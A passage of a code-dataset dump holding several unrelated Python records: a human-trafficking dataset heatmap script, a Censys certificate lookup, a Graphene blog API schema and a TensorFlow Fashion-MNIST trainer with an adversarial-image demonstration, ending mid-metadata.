"sub_path": "tools/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tools.models.Tools.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 12, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 13, "usage_type": "call"}, {"api_name": "common.helpers.paged_items", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "common.helpers.paged_items", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 24, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "38768996814", "text": "import pandas as pd\r\nimport numpy as np\r\nimport pyarrow.feather as feather\r\nimport plotly.express as pl\r\nimport plotly.graph_objects as go\r\n\r\n# creates a new df to change df_ht ISO2 to ISO3 for plotly\r\niso_data = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht_region_lookup.ft\")\r\niso_data = iso_data[['ISO2', 'ISO3']]\r\n# converts df to dict for easy replace function\r\niso_dict = dict(iso_data.values)\r\n\r\n# creates new df_ht\r\ndf_ht = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht.ft\")\r\n# replaces ISO2 to ISO3 for citizenship\r\ndf_ht = df_ht.replace({\"citizenship\": iso_dict})\r\n\r\nbool_names = [ 'majorityStatusAtExploit', 'majorityEntry', 'meansOfControlDebtBondage', \r\n 'meansOfControlTakesEarnings', 'meansOfControlRestrictsFinancialAccess', 'meansOfControlThreats', 'meansOfControlPsychologicalAbuse', 'meansOfControlPhysicalAbuse', \r\n 'meansOfControlSexualAbuse', 'meansOfControlFalsePromises', 'meansOfControlPsychoactiveSubstances', 'meansOfControlRestrictsMovement', \r\n 'meansOfControlRestrictsMedicalCare', 'meansOfControlExcessiveWorkingHours', 'meansOfControlUsesChildren', 'meansOfControlThreatOfLawEnforcement', \r\n 'meansOfControlWithholdsNecessities', 'meansOfControlWithholdsDocuments', 'meansOfControlOther', 'meansOfControlNotSpecified', \r\n 'isForcedLabour', 'isSexualExploit', 'isOtherExploit', 'isSexAndLabour', 'isForcedMarriage', 'isForcedMilitary', 'isOrganRemoval', 'isSlaveryAndPractices', \r\n 'typeOfLabourAgriculture', 'typeOfLabourAquafarming', 'typeOfLabourBegging', 'typeOfLabourConstruction', 'typeOfLabourDomesticWork', \r\n 'typeOfLabourHospitality', 'typeOfLabourIllicitActivities', 'typeOfLabourManufacturing', 'typeOfLabourMiningOrDrilling', 'typeOfLabourPeddling', \r\n 'typeOfLabourTransportation', 'typeOfLabourOther', 'typeOfLabourNotSpecified', 'typeOfSexProstitution', 'typeOfSexPornography', \r\n 'typeOfSexRemoteInteractiveServices', 'typeOfSexPrivateSexualServices', 'isAbduction', 'recruiterRelationIntimatePartner', \r\n 'recruiterRelationFriend', 'recruiterRelationFamily', 'recruiterRelationOther', 'recruiterRelationUnknown']\r\ncol_categ = ['Datasource', 'gender', 'ageBroad', 'majorityStatus', 'citizenship','yearOfRegistration','RecruiterRelationship', 'CountryOfExploitation', ]\r\ncitizenship= ([])\r\ndrop_col = ['gender', 'ageBroad', 'typeOfExploitConcatenated', 'meansOfControlConcatenated', 'typeOfLabourConcatenated', 'typeOfSexConcatenated']\r\n\r\n\r\ndef main():\r\n \"\"\"main function\"\"\"\r\n # change last two parameters to change what years you want to look between\r\n # leave last one blank for just one year\r\n make_df_year(df_ht, 2002, 2021)\r\n\r\ndef make_map(df, year:str):\r\n \"\"\"Given dataframe ir will make the world heat map\"\"\"\r\n # creates figure\r\n fig = go.Figure(data=go.Choropleth(locations = df['citizenship'], z = df['Count'], colorscale='Inferno', autocolorscale=True))\r\n # changes title\r\n fig.update_layout(title={'text':f'Human-Trafficking Heatmap based on victims citizenship for {year}'})\r\n fig.show()\r\n return\r\n\r\ndef make_df_year(df, start_y, ending_y = 0):\r\n \"\"\"Given the year it will make a dataframe with only the given year\"\"\"\r\n years = []\r\n # make list of available years to check the input is correct\r\n for year in np.sort(df['yearOfRegistration'].unique()):\r\n years.append(year)\r\n # print(f'years list: {years}')\r\n # check if only one year\r\n if ending_y == 0:\r\n if start_y in years:\r\n year_df = df.loc[df['yearOfRegistration'] == start_y]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, str(start_y))\r\n return\r\n else:\r\n print(\"Can't\")\r\n # between years\r\n else:\r\n if start_y in years and ending_y in years:\r\n year_df = df[df['yearOfRegistration'].between(start_y, ending_y)]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, f'{start_y} to {ending_y}')\r\n return\r\n else:\r\n print(\"Can't\")\r\n\r\nmain()", "repo_name": "cmonitt/Human_Trafficking", "sub_path": "human_trafficking.py", "file_name": "human_trafficking.py", "file_ext": "py", "file_size_in_byte": 4265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_feather", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_feather", "line_number": 14, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 43, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 43, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Choropleth", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "16839175316", "text": "from censys.search import CensysCertificates\nimport datetime\nimport csv\n\n\nc = CensysCertificates()\n\nnow = datetime.datetime.now()\n\nfields_to_retrieve = [\n \"parsed.subject_dn\",\n \"parsed.names\",\n \"parsed.subject.common_name\",\n \"parsed.fingerprint_sha256\",\n \"parsed.validity.start\",\n \"parsed.validity.end\",\n]\n\n\ncertificate_list = []\nheader = [\"SHA256 fingerprint\", \"Validity Start\", \"Validity End\"]\n\n\ndef create_csv():\n with open('censys.csv', 'w', encoding='UTF8', newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerow(header)\n for certificate in certificate_list:\n writer.writerow(certificate)\n\n\ndef censys_certificates():\n for page in c.search(\"parsed.names: censys.io and tags: trusted\", fields_to_retrieve):\n subject_dn = page[\"parsed.subject_dn\"]\n names = page[\"parsed.names\"]\n validity_start = page[\"parsed.validity.start\"]\n validity_end = page[\"parsed.validity.end\"]\n sha256 = page[\"parsed.fingerprint_sha256\"]\n \n censys_domain_flag = 0\n\n if \"censys.io\".lower() in subject_dn.lower():\n censys_domain_flag = 1\n else:\n for name in names:\n if \"censys.io\".lower() in name.lower():\n censys_domain_flag = 1\n break\n \n validity_end_dt = datetime.datetime.strptime(validity_end, \"%Y-%m-%dT%H:%M:%SZ\")\n\n\n if censys_domain_flag and validity_end_dt >= now:\n certificate_list.append([sha256, str(validity_start), str(validity_end)])\n\n\n\nif __name__ == \"__main__\":\n censys_certificates()\n create_csv()", "repo_name": "SaiVikhyath/Censys-Project", "sub_path": "censys_project.py", "file_name": "censys_project.py", "file_ext": "py", "file_size_in_byte": 1628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "censys.search.CensysCertificates", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}]} +{"seq_id": "31977930526", "text": "import graphene\nfrom .types import BlogType\nfrom .models import Blog\nfrom users.models import CustomUser as User\nimport json\n\nclass BlogQuery(graphene.ObjectType):\n blogs = graphene.List(BlogType)\n blog = graphene.Field(BlogType, id=graphene.ID(required=True))\n user_blogs = graphene.List(BlogType, id=graphene.ID(required=True))\n\n def resolve_blogs(parent, info):\n return Blog.objects.all()\n \n def resolve_blog(parent, info, id):\n return Blog.objects.get(pk=id)\n\n def resolve_user_blogs(parent, info, id):\n author = User.objects.get(pk=id)\n return Blog.objects.filter(author=author)\n \nclass CreateBlogMutation(graphene.Mutation):\n class Arguments:\n title = graphene.String(required=True)\n data = graphene.String(required=True)\n tags = graphene.List(graphene.String)\n more_info = graphene.JSONString()\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, title, data, tags, more_info):\n user = info.context.user\n if(user.is_authenticated):\n author = User.objects.get(pk=user.id)\n blog = Blog(author=author, title=title, data=data, tags=tags, more_info=more_info)\n blog.save()\n return CreateBlogMutation(blog=blog)\n\n raise Exception(\"You need to login to access the api\")\n\nclass UpdateBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n title = graphene.String(required=False)\n data = graphene.String(required=False)\n tags = graphene.List(graphene.String, required=False)\n more_info = graphene.JSONString(required=False)\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, id, title=None, data=None, tags=None, more_info=None):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n \n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n if title is not None:\n blog.title = title\n \n if data is not None:\n blog.data = data\n\n if tags is not None:\n blog.tags = tags\n \n if more_info is not None:\n blog.more_info = more_info\n\n blog.save()\n return UpdateBlogMutation(blog=blog)\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to be logged in to access api\")\n\nclass DeleteBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n \n response = graphene.JSONString()\n\n @classmethod\n def mutate(cls, root, info, id):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n blog.delete()\n response = {\n \"success\": True,\n \"error\": False\n }\n return DeleteBlogMutation(response=json.dumps(response))\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to logged in to access api\")\n", "repo_name": "sleepingsaint/project-scope", "sub_path": "blogs/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 3505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphene.ObjectType", "line_number": 7, "usage_type": "attribute"}, {"api_name": "graphene.List", "line_number": 8, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 8, "usage_type": "argument"}, {"api_name": "graphene.Field", "line_number": 9, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 9, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 9, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 10, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 10, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Blog.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Blog.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 16, "usage_type": "name"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 19, "usage_type": "call"}, {"api_name": "users.models.CustomUser.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Blog.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 20, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 22, "usage_type": "attribute"}, {"api_name": "graphene.String", "line_number": 24, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 25, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 26, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 26, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 27, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 29, "usage_type": "argument"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 35, "usage_type": "call"}, {"api_name": "users.models.CustomUser.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Blog", "line_number": 36, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 42, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 44, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 45, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 46, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 47, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 47, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 48, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 50, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 50, "usage_type": "argument"}, {"api_name": "models.Blog.objects.get", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 57, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 79, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 81, "usage_type": "call"}, {"api_name": "graphene.JSONString", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Blog.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 90, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "7183277752", "text": "import datetime\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom model import mlp, conv_net\n\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nnum_steps = 100000\nprint_steps = 1000\nsave_checkpoint_steps = 1000\n\n\ndef get_data():\n \"\"\"\n Get the Fashion MNIST dataset, in the proper data-types and shapes.\n The images are transformed from uint8 in 0,...,255 to float in [0,1].\n The labels are transformed from uint8 to int32.\n \"\"\"\n from tensorflow.keras.datasets import fashion_mnist\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n n_train, h, w = x_train.shape\n n_test = x_test.shape[0]\n n_labels = len(np.unique(y_train))\n\n # Reshape the images to include a channels dimension (which is 1),\n # convert them to float32 and divide by 255 to get a value between 0 and 1\n x_train = x_train.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n x_test = x_test.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n\n # Convert the labels to int32 and not uint8, because this is what\n # TensorFlow wants (in the loss function sparse_softmax_cross_entropy_with_logits).\n y_train = y_train.astype(np.int32)\n y_test = y_test.astype(np.int32)\n\n return x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w\n\n\ndef train(model_fn, batch_size, learning_rate=None, **model_kwargs):\n \"\"\"\n load FashionMNIST data.\n create model using model_fn, and train it on FashionMNIST.\n :param model_fn: a function to create the model (should be one of the functions from model.py)\n :param batch_size: the batch size for the training\n :param learning_rate: optional parameter - option to specify learning rate for the optimizer.\n :return:\n \"\"\"\n x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w = get_data()\n\n x = tf.placeholder(dtype=tf.float32, shape=(None, h, w, 1), name='x')\n y = tf.placeholder(dtype=tf.int32, shape=(None,), name='y')\n test_mode = tf.placeholder_with_default(\n input=tf.constant(value=False, dtype=tf.bool, shape=(), name='test_mode_default'),\n shape=(),\n name='test_mode'\n )\n\n # Define the model.\n model_kwargs['test_mode'] = test_mode\n y_predict = model_fn(x, n_labels, **model_kwargs)\n\n # Define the loss function.\n loss = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=y_predict, name='non_reduced_loss'),\n name='reduced_loss'\n )\n\n # Define the optimizer.\n optimizer_kwargs = dict() if learning_rate is None else {'learning_rate': learning_rate}\n optimizer = tf.train.AdamOptimizer(**optimizer_kwargs).minimize(loss)\n\n # Define accuracy operator.\n correct_pred = tf.equal(tf.cast(tf.argmax(y_predict, axis=1), tf.int32), y)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n # Add loss and accuracy to the summary, in order to view it in TensorBoard.\n tf.summary.scalar('loss', loss)\n tf.summary.scalar('accuracy', accuracy)\n summarize = tf.summary.merge_all()\n\n # Collect losses and accuracies, both for train-data and for test-data.\n train_losses = list()\n train_accuracies = list()\n test_losses = list()\n test_accuracies = list()\n\n init = tf.global_variables_initializer()\n\n # Define the directories that will be created with the TensorBoard data and checkpoints.\n now_str = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n logs_dir_name = os.path.join('logs', model_fn.__name__, now_str)\n checkpoint_directory = os.path.join(logs_dir_name, 'checkpoints')\n checkpoint_prefix = os.path.join(checkpoint_directory, \"ckpt\")\n saver = tf.train.Saver(max_to_keep=num_steps)\n train_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'train'),\n tf.get_default_graph())\n test_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'test'),\n tf.get_default_graph())\n with tf.Session() as sess:\n sess.run(init)\n for i in range(num_steps):\n # Sample a random mini-batch of samples from the training data.\n train_batch_indices = np.random.choice(n_train, size=batch_size)\n x_train_batch = x_train[train_batch_indices]\n y_train_batch = y_train[train_batch_indices]\n\n # Run the graph in that mini-batch, including the optimizer to update the weights.\n train_loss, train_accuracy, train_summary, _ = sess.run(\n fetches=[loss, accuracy, summarize, optimizer],\n feed_dict={x: x_train_batch, y: y_train_batch}\n )\n\n train_losses.append(train_loss)\n train_accuracies.append(train_accuracy)\n train_writer.add_summary(train_summary, i)\n\n # Sample a random mini-batch of samples from the testing data.\n test_batch_indices = np.random.choice(n_test, size=batch_size)\n x_test_batch = x_test[test_batch_indices]\n y_test_batch = y_test[test_batch_indices]\n\n # Run the graph in that mini-batch, excluding the optimizer (to avoid\n # update the weights according to the test data, strictly forbidden :))\n test_loss, test_accuracy, test_summary = sess.run(\n fetches=[loss, accuracy, summarize],\n feed_dict={x: x_test_batch, y: y_test_batch, test_mode: True}\n )\n\n test_losses.append(test_loss)\n test_accuracies.append(test_accuracy)\n test_writer.add_summary(test_summary, i)\n\n # Every print_steps iterations print train-loss.\n if i % print_steps == 0:\n print(\"Iter {:05d} train-loss {:.2f} train-accuracy {:.2f}\".format(i, train_loss, train_accuracy))\n print(\"Iter {:05d} test-loss {:.2f} test-accuracy {:.2f}\".format(i, test_loss, test_accuracy))\n\n # Every save_checkpoint_steps iterations save a checkpoint.\n if i % save_checkpoint_steps == 0:\n saver.save(sess, save_path=checkpoint_prefix, global_step=i)\n\n # After the training was finished, load the latest checkpoint and evaluate the model on\n # all samples in the test-data.\n all_test_losses = list()\n all_test_accuracies = list()\n with tf.Session() as sess:\n latest_checkpoint = tf.train.latest_checkpoint(checkpoint_directory)\n new_saver = tf.train.import_meta_graph(latest_checkpoint + '.meta')\n new_saver.restore(sess, latest_checkpoint)\n for i in range(n_test // batch_size):\n x_test_batch = x_test[i:i+batch_size]\n y_test_batch = y_test[i:i+batch_size]\n\n # Run the graph in that mini-batch, including the optimizer to update the weights.\n test_loss, test_accuracy = sess.run(\n fetches=[loss, accuracy],\n feed_dict={x: x_test_batch, y: y_test_batch}\n )\n all_test_losses.append(test_loss)\n all_test_accuracies.append(test_accuracy)\n\n all_test_loss = np.array(all_test_losses).mean()\n all_test_accuracy = np.array(all_test_accuracies).mean()\n print(\"Total test-loss {:.2f} test-accuracy {:.2f}\".format(all_test_loss, all_test_accuracy))\n\n train_writer.close()\n test_writer.close()\n\n\ndef find_adversarial_image(checkpoint):\n \"\"\"\n Finds and plots the original image with the true-label and prediction,\n and the adversarial image with the (wrong) prediction.\n :param checkpoint: A checkpoint of a trained model.\n \"\"\"\n x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w = get_data()\n\n # Load the saved graph.\n new_saver = tf.train.import_meta_graph(checkpoint + '.meta')\n graph = tf.get_default_graph()\n\n # Extract the placeholders for the loaded graph,\n # and create additional tensors which calculate the classes' probabilities\n # and final class prediction (argmax of the probabilities).\n x = graph.get_tensor_by_name('x:0')\n y = graph.get_tensor_by_name('y:0')\n test_mode = graph.get_tensor_by_name('test_mode:0')\n predict_logits = graph.get_tensor_by_name('predict:0')\n predict_prob = tf.nn.softmax(logits=predict_logits, axis=1)\n # predict_class = tf.argmax(predict_prob, axis=1)\n loss = graph.get_tensor_by_name('reduced_loss:0')\n\n # Sample a random image from the training data, and sample a wrong label for it.\n i = np.random.randint(n_train)\n image = x_train[i]\n true_label = y_train[i]\n target_label = np.random.choice(list(set(np.arange(n_labels)) - {true_label}))\n\n # Create the image-loss, which implicates that the\n # resulting image will be close to the original one.\n image_tensor = tf.constant(value=image, dtype=tf.float32, name='source_image')\n image_loss = tf.reduce_mean(tf.abs(tf.subtract(x, image_tensor, name='sub'), 'abs'), name='image_loss')\n\n # Define the new loss as the weighted sum of the original loss and the image-loss.\n image_loss_weight = 0.05\n new_loss = tf.add(loss, image_loss_weight * image_loss)\n\n # Create a symbolic tensor calculating the gradient\n # of the new loss with respect to the input image.\n grad = tf.gradients(ys=new_loss, xs=[x])\n\n curr_image = image.copy().reshape(1, 28, 28, 1)\n orig_classes_prob = None\n target_label_reshaped = np.array([target_label], dtype=np.int32)\n\n with tf.Session() as sess:\n new_saver.restore(sess, checkpoint)\n\n for i in range(10000):\n # Calculate the gradient with respect to the input image,\n # as well as the predicted classes' probabilities.\n grad_image, classes_prob = sess.run(\n [grad, predict_prob],\n feed_dict={x: curr_image, y: target_label_reshaped, test_mode: True}\n )\n\n # Take the relevant values, as the sess.run return a list of nested values...\n grad_image = grad_image[0][0]\n classes_prob = classes_prob[0]\n\n # In case this is the first iteration, save the classes' probabilities\n # as they are the original prediction.\n if i == 0:\n orig_classes_prob = np.copy(classes_prob)\n\n # print('True/Target-label probabilities = {:.2f} ; {:.2f}'.format(classes_prob[target_label],\n # classes_prob[true_label]))\n\n if classes_prob[target_label] > 0.95:\n break\n\n # Update the current-image with respect to the gradient of the new loss function.\n # This makes the loss function decrease, so the prediction gets close to the target\n # label, and the image remains not fat from the original one.\n learning_rate = 0.001\n curr_image -= learning_rate * grad_image\n\n # Plot the original image, the added noise, and the final adversarial image.\n plt.subplot(1, 3, 1)\n plt.axis('off')\n plt.imshow(image[:, :, 0], cmap='gray')\n plt.title('{}, w.p. {:.4f}'.format(class_names[true_label], orig_classes_prob[true_label]))\n\n plt.subplot(1, 3, 2)\n plt.axis('off')\n plt.imshow(curr_image[0, :, :, 0] - image[:, :, 0], cmap='gray')\n plt.title('Add noise...')\n\n plt.subplot(1, 3, 3)\n plt.axis('off')\n plt.imshow(curr_image[0, :, :, 0], cmap='gray')\n plt.title('{}, w.p. {:.4f}'.format(class_names[target_label], classes_prob[target_label]))\n plt.show()\n\n\ndef main():\n # train(mlp, 64)\n # train(mlp, 64, dropout_rate=0.25)\n # train(conv_net, 64)\n train(conv_net, 64, dropout_rate=0.25)\n # find_adversarial_image(checkpoint='logs/conv_net/2019_11_16_16_38_00_drop_025/checkpoints/ckpt-50000')\n pass\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "AlonNT/APML", "sub_path": "ex1/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 11872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.datasets.fashion_mnist.load_data", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.fashion_mnist", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 151, "usage_type": "attribute"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 183, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 183, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 184, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 193, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 193, "usage_type": "attribute"}, {"api_name": 